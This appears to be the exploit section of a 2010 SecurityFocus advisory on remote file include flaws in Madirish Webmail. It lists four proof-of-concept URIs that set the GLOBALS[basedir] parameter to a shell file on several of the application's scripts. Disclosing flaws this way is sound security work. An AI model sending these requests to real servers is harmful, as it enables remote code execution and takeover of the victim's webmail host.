Madirish Webmail GLOBALS[basedir] Parameter Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/lib/addressbook.php?GLOBALS[basedir]=shell.txt?
http://www.example.com/[path]/calendar.php?GLOBALS[basedir]=shell.txt?
http://www.example.com/[path]/compose.php?GLOBALS[basedir]=shell.txt?
http://www.example.com/[path]/index.php?GLOBALS[basedir]=shell.txt?


 

Privacy Statement
Copyright 2010, SecurityFocus